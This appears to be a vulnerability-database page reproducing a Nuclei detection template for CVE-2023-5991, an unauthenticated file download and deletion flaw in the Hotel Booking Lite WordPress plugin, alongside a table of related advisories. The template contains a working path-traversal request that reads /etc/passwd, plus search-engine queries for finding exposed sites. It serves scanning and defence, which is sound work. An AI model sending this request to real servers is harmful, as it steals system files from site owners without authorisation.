| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-5991 | 26 Dec 202320:26 | – | circl | |
| WordPress plugin Hotel Booking Lite security vulnerability | 26 Dec 202300:00 | – | cnnvd | |
| CVE-2023-5991 | 26 Dec 202318:33 | – | cve | |
| CVE-2023-5991 Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion | 26 Dec 202318:33 | – | cvelist | |
| CVE-2023-5991 | 26 Dec 202319:15 | – | nvd | |
| CVE-2023-5991 | 26 Dec 202319:15 | – | osv | |
| Design/Logic Flaw | 26 Dec 202319:15 | – | prion | |
| PT-2023-32464 · WordPress · Hotel Booking Lite | 26 Dec 202300:00 | – | ptsecurity | |
| CVE-2023-5991 | 23 May 202505:08 | – | redhatcve | |
| Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion | 1 Dec 202300:00 | – | wpexploit |
id: CVE-2023-5991
info:
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
author: s4e-io
severity: critical
description: |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
impact: |
Unauthenticated attackers can exploit missing validation and authorization checks to download and delete arbitrary files on WordPress servers running Hotel Booking Lite.
remediation: Fixed in 4.8.5
reference:
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5991
cwe-id: CWE-22
epss-score: 0.03313
epss-percentile: 0.87085
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: motopress
product: hotel_booking_lite
framework: wordpress
shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
fofa-query: body=/wp-content/plugins/motopress-hotel-booking
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "/etc/passwd"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008d4856ff07baa6e3ffe724955f3ab8a5b9ab21d7a25faccb5eaac8bef0bbc68202202e96da366fc1bc24b9152198e00e3e38844c64c12556325ad241c9b2b8a612d3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation